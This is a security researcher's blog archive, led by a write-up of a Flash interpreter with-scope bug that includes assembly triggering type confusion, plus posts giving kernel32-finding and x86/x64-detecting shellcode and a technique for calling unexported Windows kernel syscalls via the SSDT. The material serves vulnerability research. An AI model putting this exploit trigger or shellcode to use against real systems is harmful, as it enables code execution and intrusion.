Archive for the ‘Security’ Category

Flash News

Tuesday, November 13th, 2018

TL;DR: There’s a bug in Adobe Flash.
The interpreter code of the ActionScript Virtual Machine (AVM)
does not reset a with-scope pointer when an exception is caught,
which later leads to a type confusion bug, and eventually to remote code execution.

First, we will start with general information on how the Flash engine, AVM, works,
because I find it fascinating and important for understanding the matter at hand.

Flash runs code by either JITting it or interpreting it. The engine is designed to verify the ActionScript3 (AS for short) code and the metadata only once, upon loading a (SWF) file, and then to run the code while trusting it (without re-validation). This significantly improves the performance of running Flash applications. It also affects the instructions: they are designed to carry their operands as part of their (fixed) bytecode. For example, the pushstring instruction takes an index into the strings array that is defined in the SWF file, and it can only point to a valid entry in that array (if it doesn’t, the verifier component will reject the file). Later, the JITted code or the interpreter assumes that the verifier already confirmed this instruction with its operand, and just loads the requested entry and pushes it to the stack. Had the index been read from a register, which can be set dynamically at runtime, a runtime check would have been required.
The AS code also supports a stack and registers, and since it is a dynamic language that lets one define members and properties (key/value pairs) on the fly, the engine has to search for them every time, and also to coerce their types to the expected types (of a function argument, for example). This coercion is done all over the place and is at the heart of keeping types safe wherever they are used. The coercion will even go further and automatically convert a value to the expected type to make a function call valid.
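
To make the verify-once, trust-later design concrete, here is a toy model in Python. It is not AVM code: the opcode tuples, the STRINGS pool and the function names are all made up for illustration. The loader validates the pushstring operand a single time, and the run loop then indexes the pool without checking again.

```python
STRINGS = ["hello", "world"]  # stand-in for the string pool defined in a SWF file


def verify(code):
    """Load-time pass: reject any pushstring whose operand is not a valid pool index."""
    for op, operand in code:
        if op == "pushstring" and not (0 <= operand < len(STRINGS)):
            raise ValueError(f"verifier: bad string index {operand}")


def run(code):
    """Run-time pass: trusts the verifier, so the operand is used as-is."""
    stack = []
    for op, operand in code:
        if op == "pushstring":
            stack.append(STRINGS[operand])  # deliberately no re-validation here
    return stack


def load_and_run(code):
    verify(code)      # happens once, when the file is loaded
    return run(code)  # everything after that assumes verified input
```

The whole safety argument rests on verify() and run() agreeing about what each instruction does, which is exactly the assumption the bug below breaks.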

When the AVM runs code, the relevant part of the verifier does its important job by statically following and analyzing all instructions: it simulates them and verifies the types of all registers, variables on the stack and more, in order to see how they are about to be used. If it sees that they are used as invalid/wrong types, it will fail loading the file in advance. Otherwise it will just let the operation continue normally, assuming the type is correct and expected. Imagine there’s a function prototype that receives an integer argument:
function foo(bar:int):void {}
but you pass a string to it instead:
foo("imahacker")
then the verifier won’t like it and will refuse to run this code. At other times, if you pass an object which has a default-value method, the engine might invoke it at runtime to hopefully get an integer, but it will make sure at runtime that it really got an integer… So some of the checks also happen at runtime, when the type can’t be known statically (so yes, it’s okay to pass an object as an integer).

Another trait of AS is what makes properties dynamic, or technically, how they are searched for every time: starting with the local scope and going up to higher scopes in the hierarchy, all the way to the globals’ scope. This is all documented. It hurts to know how much searching is done in order to find the right property in the scope chain every time code accesses it.
Perhaps Flash gives full OOP abilities on top of a dynamic language, but when we take a look at the open source code of the AVM, it’s really horrifying: code duplication all over instead of encapsulation, or the same part of the SWF parsed in multiple places with different functionality applied to it each time, and other horrors… that we, security researchers, love.

Anyway, Flash prefers to use the JIT as much as possible to run actual code, because it’s faster. It emits real code for the target hosting architecture while doing the same pass that verifies the code. It can even JIT a function while it’s already running inside the interpreter and continue from that state, impressive. However, remember that the interpreter is always used to run constructors of a user class defined in the SWF. And this is how we make sure our code gets to run inside the vulnerable interpreter. The engine also handles exceptions on its own (try-catch and throw), employing setjmp and longjmp, so if an exception is raised inside an AS function, the interpreter implementation or the JIT infrastructure itself will catch it and pass it along to the next handler in the chain, until a correct AS catch-handler with the right type is found and execution resumes inside the interpreter, in our case, from that spot of the catch handler.
Basically, if you try to make a function call itself in infinite recursion, you won’t see a native (Windows/Linux) exception thrown; rather, the interpreter artificially checks the size of its own stack in some spots and emulates its own stack overflow/underflow exceptions. If you try to do an integer division by zero, they already handle it themselves in the div instruction handler, etc. It’s a pretty robust and closed system. There are many other interesting Flash internals topics, like atoms, the garbage collector, the JIT, etc., but they won’t be covered today.

Now that you have some idea of how the AVM works,
let’s talk business.
In AS you can use the keyword “with” to be lazy and omit the name of the instance whose members you want to access.
That’s normal in many scripting languages, but I will show it nevertheless.
For example, instead of doing:
point.x = 0x90;
point.y = 0xc3;
point.z = 0xcd;
It can be written as follows using the “with” keyword:
with (point)
{
 x = 0x90;
 y = 0xc3;
 z = 0xcd;
}
For each assignment the interpreter will first use the with-scope, if it’s set, to avoid searching the full chain; once it has got the property, it makes the assignment itself. So, there’s an actual function that looks up the property in the scopes array of a given function. The bug originates when an exception is thrown in the code: the catch handler infrastructure inside the interpreter will NOT reset its with-scope variable, so it will keep looking for properties in that with-scope from then on. But (a big BUTT) the verifier, while simulating the exception catching,
will reset its own state for the with-scope. And this, ladies and gentlemen, leads to a discrepancy between the verifier and the interpreter, which opens the door to a type confusion attack. Pow pow pow. In other words, we managed to make the interpreter do one thing, while the verifier thinks it does another (legit) thing.

This is how we do it:
In the beginning we load the with-scope with a legit object. We later raise a dummy exception and immediately catch it ourselves. Now the interpreter will still use the with-object we loaded, although the verifier thinks we don’t use a with-scope anymore. We then query the with-scope again for a member with a certain controlled type, and use it as an argument for a function or an operand for an instruction that expects something else, and voila, we’ve got a type confusion. Remember, the verifier will think we use a different property that matches the expected type we want to forge, and thus won’t fail loading our file.
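
The discrepancy can be replayed with a small Python model. This is a simplified reading of the description above, not the AVM implementation: the Frame class, the "declared"/"dynamic" dictionaries and the replay() helper are hypothetical names, and the only difference between the two runs is whether the catch step resets the with-scope index.

```python
class Frame:
    """Toy per-function state: a scope stack plus the index where with-scopes start."""

    def __init__(self):
        self.scopes = []
        self.with_base = None

    def pushscope(self, obj):
        self.scopes.append(obj)

    def pushwith(self, obj):
        if self.with_base is None:
            self.with_base = len(self.scopes)  # remember where with-scopes begin
        self.scopes.append(obj)

    def catch(self, reset_with_base):
        self.scopes.clear()        # both sides empty the scope stack
        if reset_with_base:
            self.with_base = None  # only the verifier model does this

    def findproperty(self, name):
        # Search from the innermost scope outwards.
        for i in range(len(self.scopes) - 1, -1, -1):
            obj = self.scopes[i]
            as_with = self.with_base is not None and i >= self.with_base
            # In this model, dynamic properties are only visible through a with-scope.
            if as_with and name in obj["dynamic"]:
                return obj["dynamic"][name]
            if name in obj["declared"]:
                return obj["declared"][name]
        raise KeyError(name)


def replay(reset_with_base):
    """Run the same instruction sequence under verifier-like or interpreter-like rules."""
    this = {"declared": {"myvar": "NewClass2 instance"}, "dynamic": {}}
    fake = {"declared": {}, "dynamic": {"myvar": 534568}}
    frame = Frame()
    frame.pushscope(this)
    frame.pushwith(this)           # with_base now points at slot 1
    frame.catch(reset_with_base)   # throw, then land in the catch handler
    frame.pushscope(this)
    frame.pushscope(fake)          # lands in slot 1, where a stale with_base still points
    return frame.findproperty("myvar")
```

Here replay(True) plays the verifier and finds the NewClass2-typed property, while replay(False) plays the interpreter and gets the integer from the fake object.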

Let’s see the bug in the interpreter code first, and then an example on how to trigger it.
At line 796, you can see:
register Atom* volatile withBase = NULL;

That’s the local variable of the interpreter function that we’re messing up with (pun intended)! Note that technically withBase is used as a pointer-offset into the scopeBase array
(that’s all the scopes that the function loaded on its scopes stack), but that doesn’t change the logic or nature of the bug, just how we tailor the bits and bytes to trigger it. If you are interested in understanding this confusing description, you will have to read the findproperty implementation. And at line 2347, which is the handler of the findproperty instruction:
*(++sp) = env->findproperty(scope, scopeBase, scopeDepth, multiname, b1, withBase);

See, they pass withBase to findproperty, which is the function that looks up a property in the scope chain. This is where we will make it return a different property,
while the verifier will think it returned a validly typed property from our object. Now, we can use the throw keyword to raise an exception, and the catch handler infrastructure at line 3540 will handle it:
CATCH (Exception *exception)

You can see that it resets many variables of its own state machine, sets the interpreter’s PC (program counter, or next instruction’s address) to the target handler’s address, etc.
But they forgot to reset withBase. I bet they didn’t really forget, and did it for performance’s sake; their code has tons of obsessive micro-optimizations that a good engineer today just wouldn’t do. You can also note that they clear the scopeBase array only in debugger mode (line 3573), and that used to be another bug, until they realized they had better always do it.
They used to have many bugs around the scope arrays in the interpreter, but they’re all fixed now in the binaries; since we are looking at old source code, you can still find them.

Finally, let’s see how we put it all together.
I used the great rabcdasm tool to assemble this.
This code is partial and contains only the relevant guts of the triggering exploit.

; All functions start with some default scope, we keep it too.
getlocal0
pushscope

; We create a property with the name "myvar" that is really an object itself of type NewClass2.
; This property which is inside the object/dictionary will be the one the verifier sees.
getlocal0
findpropstrict QName(PackageNamespace(""), "NewClass2")
constructprop QName(PackageNamespace(""), "NewClass2"), 0
initproperty QName(PackageInternalNs(""), "myvar")

; We push a second item on the scope array,
; to make the withBase point to its location in the scopes array.
; Note this array contains both normal scope objects and with scope objects.
getlocal0
pushwith

; Now we throw an exception, just to make the interpreter keep a stale withBase.
L10:
pushbyte 1
throw
L12:
nop
L16:
; This is our catch handler, we continue to do our thing.
; Now note that the withBase points to the second item on the scopes array,
; which currently won't be used until we put something there (because the scopes array is empty).

; Put back the first scope on the scope stack, so we can work normally.
getlocal0
pushscope

; Now we're going to create an object which has one property of an integer type and its name is "myvar".
; This property will be returned instead of the correct one from the object we created above.
pushstring "myvar"
; Next is the attacking type to be really used instead!!!1@ :)
; This is the actual value that will be fetched by getproperty instruction below.
pushint 534568
; Create an object with 1 property (name, value pair on the stack)
newobject 1
; Mark it as an object type.
coerce QName(PackageNamespace(""), "Object")

; And now push it to the scope, note we don't use pushwith this time!
; Because we want to keep old value, otherwise verifier will be on to us,
; This makes our object that we just created as the new with-scope object.
pushscope

; Now, findproperty et al will actually scan for our property using the withBase in practice,
; which has our fake object that we recently created,
; containing a property with the "myvar" name, with a different type from what the verifier sees
; (Remember - it sees the object above, in the beginning of this function).
findproperty Multiname("myvar", [PackageInternalNs(""), PackageNamespace("")])
getproperty Multiname("myvar", [PackageInternalNs(""), PackageNamespace("")])

; Now practically on the stack we have an integer,
; instead of an object, and next executing getslot which assumes an object (NewClass2) is in the stack,
; will crash miserably!
getslot 1

returnvoid

The triggering code can be written in many different variations. Instructions like nextvalue can be targeted too, because they don’t verify their operands at runtime and can leak pointers, etc.
When I first found this bug, I thought there was only a small chance it was a real bug. In particular, I had my doubts because the chances of having a forgotten/dangling with-scope in a normal Flash application seemed high. So how come nobody encountered this bug before as a misbehavior of their app, e.g. by getting a wrong variable? Apparently, the chances of hitting the exact combination that causes this scenario are not that high after all.

Good bye Flash, you’ve been kind…

Exploiting Android Stagefright with ASLR Bypass

Friday, March 4th, 2016

Everybody knows that exploiting remote code execution vulnerabilities is a real challenge. Rumor has it that some entities around the world managed to do it, but AFAIK nobody published anything, as they might be using it for gathering intelligence. NorthBit, an Israeli security consultancy company, researched the vulnerability and managed to bypass ASLR by exploiting the bug through a browser on Android 5.0 and 5.1 for Samsung devices.

For more details see http://tinyurl.com/h4deqjg

Kernel Exploits

Monday, November 21st, 2011

Hey

I’m uploading a presentation by a good friend, Gilad Bakas, who has just spoken at Ruxcon in Australia.

Get it now: Kernel Exploits

Enjoy

isX64 Gem

Wednesday, July 13th, 2011

I needed a multi-arch shellcode for both x86 and x64 in the same code. Suppose you want to attack a platform which can be either x86 or x64, and you don’t know in advance which it is. The problem then is which version you really need to run at runtime, right?

This is a tiny trick I’ve been using for a long while now which tells whether you run on x64 or not:

XOR EAX, EAX
INC EAX ; = DB 0x40
NOP
JZ x64_code
x86_code:
bits 32
.
.
.
RET
x64_code:
bits 64
.
.

The idea is very simple: x64 and x86 share most opcode values, but there is a small dissimilarity in the range 0x40-0x4F. In x86 this range is used for the one-byte INC and DEC opcodes. Since there are 8 GPRs (General Purpose Registers) and 2 opcodes, they span the whole range of 0x40-0x4F.
Now when AMD64’s ISA (Instruction Set Architecture) was designed, they added another set of 8 GPRs, making it a whopping total of 16 GPRs. In a world where x86 ruled, you only needed 3 bits in the ModRM byte (a byte in the instruction that tells the processor how to read its operands) to access a specific register from 0 to 7. With the new ISA, an extra bit was required in order to be able to address all 16 registers. Therefore, a new prefix (called the REX prefix) was added to solve this problem with an extra bit (and there’s more to it, not relevant for now). The new prefix took over the range of 0x40-0x4F, thus eliminating the old one-byte INC/DEC (no worries however, compilers now use the existing two-byte variation of these instructions).
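
To see the extra bit at work, here is a small Python sketch that splits a REX prefix into its flag bits and combines them with the 3-bit ModRM fields. The function names are mine, and it only handles the register-to-register form of ModRM. The sample bytes 4C 8B D1 encode mov r10, rcx, the instruction that opens the 64-bit ntdll syscall stubs.

```python
def decode_rex(byte):
    """Split a REX prefix (bit pattern 0100WRXB) into its four flag bits."""
    if byte & 0xF0 != 0x40:
        raise ValueError("not a REX prefix")
    return {
        "W": (byte >> 3) & 1,
        "R": (byte >> 2) & 1,
        "X": (byte >> 1) & 1,
        "B": byte & 1,
    }


def modrm_registers(rex, modrm):
    """Return (reg, rm) register numbers for a register-direct ModRM byte."""
    if modrm >> 6 != 0b11:
        raise ValueError("this sketch only handles register-direct ModRM")
    reg = (rex["R"] << 3) | ((modrm >> 3) & 7)  # REX.R supplies the 4th bit of reg
    rm = (rex["B"] << 3) | (modrm & 7)          # REX.B supplies the 4th bit of rm
    return reg, rm
```

For 4C 8B D1, decode_rex(0x4C) has W and R set, and the ModRM byte 0xD1 then resolves to register 10 (r10) as the destination and register 1 (rcx) as the source.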

Back to our assembly code: it depends on the fact that on x86, INC EAX really increments EAX by one, so EAX becomes 1 and the zero flag is cleared if the code runs on x86. When it runs on x64, the same byte becomes a prefix to the NOP instruction, which doesn’t do anything anyway. Hence, EAX stays zero, the zero flag set by the XOR survives, and the JZ is taken. Just a final note for the inexperienced: in x64, writes to 32 bit registers are automatically zero-extended to the full 64 bit registers, so RAX is also 0.
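
The same reasoning can be checked with a toy decoder in Python. It is only a sketch: it understands just the handful of opcodes used by the stub (XOR EAX,EAX, the 0x40 byte, NOP and JZ rel8), and the function name and STUB constant are made up for this example.

```python
def takes_x64_branch(code, bits):
    """Emulate the stub in 32- or 64-bit mode and report whether the JZ is taken."""
    eax, zf, i = 0xDEADBEEF, False, 0
    while i < len(code):
        op = code[i]
        if op == 0x31 and code[i + 1] == 0xC0:    # XOR EAX, EAX
            eax, zf = 0, True
            i += 2
        elif 0x40 <= op <= 0x4F and bits == 64:   # REX prefix: no effect on flags or EAX
            i += 1
        elif op == 0x40:                          # 32-bit mode: INC EAX
            eax = (eax + 1) & 0xFFFFFFFF
            zf = eax == 0
            i += 1
        elif op == 0x90:                          # NOP
            i += 1
        elif op == 0x74:                          # JZ rel8: taken only if ZF is set
            return zf
        else:
            raise ValueError(f"unsupported opcode {op:#x}")
    raise ValueError("no JZ found")


# XOR EAX,EAX / INC EAX (or REX) / NOP / JZ +0
STUB = bytes([0x31, 0xC0, 0x40, 0x90, 0x74, 0x00])
```

Running the same six bytes with bits=32 falls through to the x86 path, while bits=64 takes the jump to the x64 path.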

Finding Kernel32 Base Address Shellcode

Thursday, July 7th, 2011

Yet another one…
This time, smaller, more correct, and still null-free.
I looked a bit at some shellcodes at exploit-db and googled too, to see whether anyone had a smaller way, to no avail.

I based my code on:
http://skypher.com/index.php/2009/07/22/shellcode-finding-kernel32-in-windows-7/
which, AFAIK, is based on:
http://blog.harmonysecurity.com/2009_06_01_archive.html

And this is my version:

00000000 (02) 6a30                     PUSH 0x30
00000002 (01) 5e                       POP ESI
; Use DB 0x64; LODSD
00000003 (02) 64ad                     LODS EAX, [FS:ESI]
00000005 (03) 8b700c                   MOV ESI, [EAX+0xc]
00000008 (03) 8b761c                   MOV ESI, [ESI+0x1c]
0000000b (03) 8b5608                   MOV EDX, [ESI+0x8]
0000000e (04) 807e1c18                 CMP BYTE [ESI+0x1c], 0x18
00000012 (02) 8b36                     MOV ESI, [ESI]
00000014 (02) 75f5                     JNZ 0xb

The tricky part was how to read from FS:0x30, and the way I use is the smallest one, at least from what I checked.
Another issue that was fixed is the check for kernel32.dll. The usual variation of this shellcode checks for a null byte, but that turned out to be bogus on W2k machines, so it was changed to check for a null word, making the shellcode a byte or two longer.

This way, it’s only 22 bytes, and it doesn’t assume that kernel32.dll is the second/third entry in the list; it actually loops until it finds the correct module name length (len of ‘kernel32.dll’ * 2 bytes). That matters because kernelbase.dll can come first, which renders lots of implementations of this technique unusable.
And obviously the resulting base address of kernel32.dll is in EDX.
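
The numbers above are easy to double check in Python. This sketch takes the shellcode bytes straight from the listing, while the helper names are mine. It confirms the size, the absence of null bytes, and that the 0x18 compared by the CMP instruction is the UTF-16 length of "kernel32.dll".

```python
# Bytes copied from the disassembly listing above.
SHELLCODE = bytes.fromhex("6a30 5e 64ad 8b700c 8b761c 8b5608 807e1c18 8b36 75f5")


def unicode_string_length(name):
    """Byte length of a module name stored as UTF-16 without a terminator."""
    return len(name.encode("utf-16-le"))


def matches_length_check(name):
    """Mimic CMP BYTE [ESI+0x1c], 0x18: only the low byte of the length is compared."""
    expected = SHELLCODE[0x11]  # the immediate operand of the CMP instruction
    return (unicode_string_length(name) & 0xFF) == expected
```

Note that the check is purely length based, so any other 12-character module name would pass it too; it works here because of which modules appear early in the list.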

Enjoy

[Update July 9th:]
Here’s a link to an explanation about PEB/LDR lists.
See first comment for a better version which is only 17 bytes.

Calling System Service APIs in Kernel

Wednesday, January 26th, 2011

In this post I am not going to shed any new light on this topic, but I didn’t find anything like this organized in one place, so I decided to write it down. I hope you will find it useful.

Sometimes when you develop a kernel driver you need to use some internal API that cannot be accessed normally through the DDK. You may say “but it’s not an API if it’s not officially exported and supported by MS”. Well, that’s kinda true; the point is that some functions which are not accessible from the kernel are really accessible from usermode, hence they are called API. After all, if you can call NtCreateFile from usermode, eventually you’re supposed to be able to do that from kernel, cause it really happens in kernel, right? Obviously, NtCreateFile is an official API in the kernel too.

When I say using system service APIs, I really mean doing it in a platform/version independent way, so it will work on all versions of Windows. The exception is when MS changes the interface to the services themselves (the number of parameters, for instance, or their types), but that rarely happens.

I am not going to explain the architecture of the SSDT, the transitions from user to kernel, or how syscalls etc. work. Just how to use it to our advantage. It is clear that MS doesn’t want you to use some of its APIs in the kernel. But sometimes it’s unavoidable, and using undocumented API is fine with me, even in production(!), if you know how to do it well and as robustly as possible, but that’s another story. We know that MS doesn’t want you to use some of these APIs because a) they just don’t export them in the kernel, on purpose that is; b) starting with 64 bits versions of Windows, they made it harder on purpose to use or manipulate the kernel by removing previously exported symbols from it; we will get to that later on.

Specifically I needed ZwProtectVirtualMemory, because I wanted to change the protection of some page in the user address space. And that function isn’t exported by the DDK, bummer. Now remember that it is accessible to usermode (as VirtualProtect through kernel32.dll, which ends up in a syscall…), therefore there ought to be a way to get it (the address of the function in kernel) in a reliable manner inside a kernel mode driver in order to use it too. And this is what I’m going to talk about in this post. I’m going to assume that you already run code in the kernel and that you are a legitimate driver, because that’s really going to help us with some exported symbols. I’m not talking about shellcodes here, although shellcodes can use this technique by changing it a bit.

We have a few major tasks in order to achieve our goal: map the usermode equivalent .dll file; get the index number of the service we want to call; then get the base address of ntos and the address of the (service) table of pointers (the SSDT itself) to the functions in the kernel. And voila…

The first one is easy both in 32 and 64 bits systems. There are mainly 3 files which make the syscalls in usermode: ntdll, kernel32 and user32 (for GDI calls). For each API you want to call in kernel, you have to know its prototype and in which file you will find it (MSDN supplies some of this, or just Google it). The idea is to map the file to the address space as an (executable) image. Note that the cool thing about this mapping is that you will get the address of the required file in usermode. Remember that these files are physically shared among all processes after boot time (for instance, addresses might change because of ASLR, but they stay consistent as long as the machine is up). Following that, we will use functionality similar to GetProcAddress, but one that you have to write yourself in kernel, which is really easy for PE and PE+ (64 bits).

Alright, so we’ve got the image mapped, and we can now get some usermode API function’s address using our GetProcAddress. Now what? Well, now we have to get the index number of the syscall we want. Before I continue, this is the right place to say that I’ve seen so many approaches to this problem: disassemblers, binary pattern matching, etc. And I decided to come up with something really simple and maybe new. You take two functions that you know for sure are going to be inside ntdll.dll (for instance), say, NtCreateFile and NtClose. Then you simply compare both functions byte after byte to find the first differing byte; that byte contains the index number of the syscall (or really the low byte of the 4 byte integer). You probably have no idea what I’m talking about, so let me show you some usermode APIs that directly do syscalls:

XP SP3 ntdll.dll
B8 25 00 00 00                    mov     eax, 25h        ; NtCreateFile
BA 00 03 FE 7F                    mov     edx, 7FFE0300h
FF 12                             call    dword ptr [edx]
C2 2C 00                          retn    2Ch

B8 19 00 00 00                    mov     eax, 19h        ; NtClose
BA 00 03 FE 7F                    mov     edx, 7FFE0300h
FF 12                             call    dword ptr [edx]
C2 04 00                          retn    4

Vista SP1 32 bits ntdll.dll

B8 3C 00 00 00                    mov     eax, 3Ch        ; NtCreateFile
BA 00 03 FE 7F                    mov     edx, 7FFE0300h
FF 12                             call    dword ptr [edx]
C2 2C 00                          retn    2Ch

B8 30 00 00 00                    mov     eax, 30h        ; NtClose
BA 00 03 FE 7F                    mov     edx, 7FFE0300h
FF 12                             call    dword ptr [edx]
C2 04 00                          retn    4

Vista SP2 64 bits ntdll.dll

4C 8B D1                          mov     r10, rcx        ; NtCreateFile
B8 52 00 00 00                    mov     eax, 52h
0F 05                             syscall
C3                                retn

4C 8B D1                          mov     r10, rcx        ; NtClose
B8 0C 00 00 00                    mov     eax, 0Ch
0F 05                             syscall
C3                                retn

2008 sp2 64 bits ntdll.dll

4C 8B D1                          mov     r10, rcx        ; NtCreateFile
B8 52 00 00 00                    mov     eax, 52h
0F 05                             syscall
C3                                retn

4C 8B D1                          mov     r10, rcx        ; NtClose
B8 0C 00 00 00                    mov     eax, 0Ch
0F 05                             syscall
C3                                retn

Win7 64bits syswow64 ntdll.dll

B8 52 00 00 00                    mov     eax, 52h        ; NtCreateFile
33 C9                             xor     ecx, ecx
8D 54 24 04                       lea     edx, [esp+arg_0]
64 FF 15 C0 00 00+                call    large dword ptr fs:0C0h
83 C4 04                          add     esp, 4
C2 2C 00                          retn    2Ch

B8 0C 00 00 00                    mov     eax, 0Ch        ; NtClose
33 C9                             xor     ecx, ecx
8D 54 24 04                       lea     edx, [esp+arg_0]
64 FF 15 C0 00 00+                call    large dword ptr fs:0C0h
83 C4 04                          add     esp, 4
C2 04 00                          retn    4

These are a few snippets to show you what the syscall function templates look like. They are generated automatically by some tool MS wrote, and they don’t change a lot, as you can see from the various architectures I gathered here. Anyway, if you take a look at the byte block of each function, you will see that you can easily spot the place where the index of the syscall can be read. That’s why doing a diff on two functions from the same .dll works well and reliably. Needless to say, we are going to use the index number we get with the table inside the kernel, in order to get the corresponding function in the kernel.

This technique gives us the index number of the syscall of any exported function in any one of the .dlls mentioned above. This is valid for both 32 and 64 bits. And by the way, notice that the operand (an immediate) that represents the index number is always a 4 byte integer (dword) in the ‘mov’ instruction, which just makes life easier.
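
Here is the diffing idea as a short Python sketch, using the stub bytes from the listings above. The function and constant names are mine. It also assumes that the two syscall indexes differ in their low byte; if they only differed in a higher byte, the first mismatch would land in the middle of the dword.

```python
import struct


def syscall_index_offset(stub_a, stub_b):
    """Offset of the first byte where two syscall stubs differ."""
    for offset, (a, b) in enumerate(zip(stub_a, stub_b)):
        if a != b:
            return offset
    raise ValueError("no difference found in the compared range")


def syscall_index(stub, offset):
    """Read the 4-byte little-endian immediate that starts at the given offset."""
    return struct.unpack_from("<I", stub, offset)[0]


# XP SP3 ntdll.dll: NtCreateFile and NtClose
XP_CREATEFILE = bytes.fromhex("B8 25 00 00 00 BA 00 03 FE 7F FF 12 C2 2C 00")
XP_CLOSE = bytes.fromhex("B8 19 00 00 00 BA 00 03 FE 7F FF 12 C2 04 00")

# Vista SP2 64 bits ntdll.dll: NtCreateFile and NtClose
X64_CREATEFILE = bytes.fromhex("4C 8B D1 B8 52 00 00 00 0F 05 C3")
X64_CLOSE = bytes.fromhex("4C 8B D1 B8 0C 00 00 00 0F 05 C3")
```

The offset found from one known pair can then be reused to read the index of any other stub in the same .dll, since they all share the template.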

On to the next task: in order to find the base address of the service table, or what is known as the system service descriptor table (SSDT for short), we will have to get the base address of the ntoskrnl.exe image first. There might be a different kernel image loaded in the system (with or without PAE, uni-processor or multi-processor), but it doesn’t matter for the technique I’m going to use, because it’s based on memory and not on files… This task is really easy when you are a driver: if you want some exported symbol from the kernel that the DDK supplies, the PE loader will get it for you. So we get, without any work, the address of any function like NtClose or NtCreateFile, etc. Both are inside ntos, obviously. Starting with that address, we round it down to the nearest page boundary and scan downwards, page by page, to find an ‘MZ’ signature, which marks the base address of the whole image in memory. If you’re afraid of false positives with this technique, you’re welcome to go further and check for a ‘PE’ signature, or use other techniques.

This should do the trick:

PVOID FindNtoskrnlBase(PVOID Addr)
{
    /// Scandown from a given symbol's address.
    Addr = (PVOID)((ULONG_PTR)Addr & ~0xfff);
    __try {
        while ((*(PUSHORT)Addr != IMAGE_DOS_SIGNATURE)) {
            Addr = (PVOID) ((ULONG_PTR)Addr - PAGE_SIZE);
        }
        return Addr;
    }
    __except(1) { }
    return NULL;
}

And you can call it with a parameter like FindNtoskrnlBase(ZwClose). This is what I meant by saying that you know the address of ZwClose, or of any other symbol in the image, which gives you some “anchor”.
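
For the extra ‘PE’ signature check mentioned above, here is a user-mode Python model of the same scan-down over a byte buffer instead of kernel memory. The function names and the fake memory layout are made up for the example; the only format facts it relies on are that e_lfanew sits at offset 0x3C of the DOS header and points to the "PE\0\0" signature.

```python
import struct
from typing import Optional

PAGE_SIZE = 0x1000


def find_image_base(mem: bytes, addr: int) -> Optional[int]:
    """Scan down page by page for 'MZ', and accept it only if 'PE\\0\\0' follows e_lfanew."""
    addr &= ~(PAGE_SIZE - 1)  # round down to the page boundary
    while addr >= 0:
        if mem[addr:addr + 2] == b"MZ":
            (e_lfanew,) = struct.unpack_from("<I", mem, addr + 0x3C)
            pe_off = addr + e_lfanew
            if mem[pe_off:pe_off + 4] == b"PE\0\0":
                return addr
        addr -= PAGE_SIZE
    return None


def demo_memory() -> bytes:
    """Three fake pages: a real-looking header at 0x1000 and a decoy 'MZ' at 0x2000."""
    mem = bytearray(3 * PAGE_SIZE)
    mem[0x1000:0x1002] = b"MZ"
    struct.pack_into("<I", mem, 0x1000 + 0x3C, 0x80)  # e_lfanew
    mem[0x1080:0x1084] = b"PE\0\0"
    mem[0x2000:0x2002] = b"MZ"                        # false positive without a PE header
    return bytes(mem)
```

Starting from an address inside the third page, the scan skips the decoy and returns 0x1000, which is the false positive case the ‘MZ’-only loop would get wrong.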

After we got the base address of ntos, we need to retrieve the address of the service table in kernel. That can be done using the same GetProcAddress we used earlier on the mapped user mode .dll files. But this time we will be looking for the “KeServiceDescriptorTable” exported symbol.

So far you can see that we got anchors (what I call a reliable way to get the address of anything in memory) and we are good to go; this will work in production without the need to worry. If you wanna start a flame war about the illegitimate use of undocumented APIs, etc., I’m clearly not interested. :)
Anyway, in Windows 32 bits, the latter symbol is exported, but it is not exported in 64 bits! This is part of the PatchGuard system, to make life harder for rootkits, 3rd party drivers doing exactly what I’m talking about, etc. I’m not going to cover how to get that address in 64 bits in this post.

The KeServiceDescriptorTable is a table that holds a few pointers to other service tables, which contain the real addresses of the service functions the OS supplies to usermode. So a simple dereference of the table gets you the pointer to the first table, which is the one you are looking for. Using that pointer, which is really the base address of the pointers table, you index it with the number we read earlier from the required function and you get, at last, the pointer to that function in kernel, which you can now use.
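
As a sketch of that final lookup, here is a Python model over a fake 32-bit memory image. Everything in it is an assumption for illustration: the four-dword descriptor layout (table base, counter table, number of services, parameter table) is the commonly described, undocumented 32-bit layout, "addresses" are simply offsets into the buffer, and the function pointers are invented values.

```python
import struct


def resolve_service(mem: bytes, descriptor_off: int, index: int) -> int:
    """Dereference the first service table and return the function pointer at index."""
    table_base, _counters, count, _params = struct.unpack_from("<4I", mem, descriptor_off)
    if index >= count:
        raise IndexError("syscall index is outside the service table")
    return struct.unpack_from("<I", mem, table_base + 4 * index)[0]


# Fake memory: a 16-byte descriptor at offset 0, followed by a 3-entry pointer table.
FAKE_TABLE = struct.pack("<3I", 0x80501000, 0x80502000, 0x80503000)
FAKE_DESCRIPTOR = struct.pack("<4I", 16, 0, 3, 0)  # table starts right after the descriptor
FAKE_MEM = FAKE_DESCRIPTOR + FAKE_TABLE
```

The bounds check against the number of services is cheap insurance in case the index read from the usermode stub is not what you expected.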

The bottom line is that now you can use any API that is given to usermode also in kernelmode, and you’re not limited to a specific Windows version, nor updates, etc., and you can do it in a reliable manner, which is the most important thing. Also, we didn’t require any special algorithms or disassemblers (as much as I like diStorm…). Doing so in shellcodes makes life a bit harder, because we relied on the assumption that we have some reliable way to find the ntos base address. But every kid around the block knows it’s easy to do it anyway.

Happy coding :)

References I found interesting about this topic:
http://j00ru.vexillium.org/?p=222
http://alter.org.ua/docs/nt_kernel/procaddr/

http://uninformed.org/index.cgi?v=3&a=4&p=5

And how to do it in 64 bits:

http://www.gamedeception.net/threads/20349-X64-Syscall-Index

New Project – ReviveR

Saturday, September 25th, 2010

Hey all,

Long time no post. I’m kinda busy with lots of stuff.
Anyway, I just wanted to let you know that I’m starting to work on the sequel to diStorm, you guessed it right… A reversing studio!
Unlike what many people said, the core is going to be written in C++, and the GUI is going to be written per OS. No thanks, QT. Top goals are performance, scripting, good UI and, most important, good analysis capabilities. Obviously it’s going to be open source and cross platform. For a start, it will support only x86 and AMD64 and the PE file format, maybe ELF too, though that’s not my priority. I’m not sure about a debugger yet, but it will probably be implemented later. The GUI is going to be written using WPF under C#, just to give you an idea.

My main interests are performance and binary code analysis algorithms.

If there are highly skilled programmers who wish to help, please contact me.
For now it seems we are a group of 4 coders, I’m still not going to publish their names, until everything is settled.

Anyway, design is taking place nowadays. This is your time for suggesting new features and ideas.

Big good luck

diStorm3 is Ready

Monday, August 16th, 2010

diStorm3 is ready for the masses! :)
– if you want to maximize the information you get from a single instruction; Structure output rather than text, flow control analysis support and more!

Check it out now at its new google page.

Good luck!

Heapos Forever

Friday, August 6th, 2010

There are still hippos around us, beware:
heapo

Kernel heap overflow.

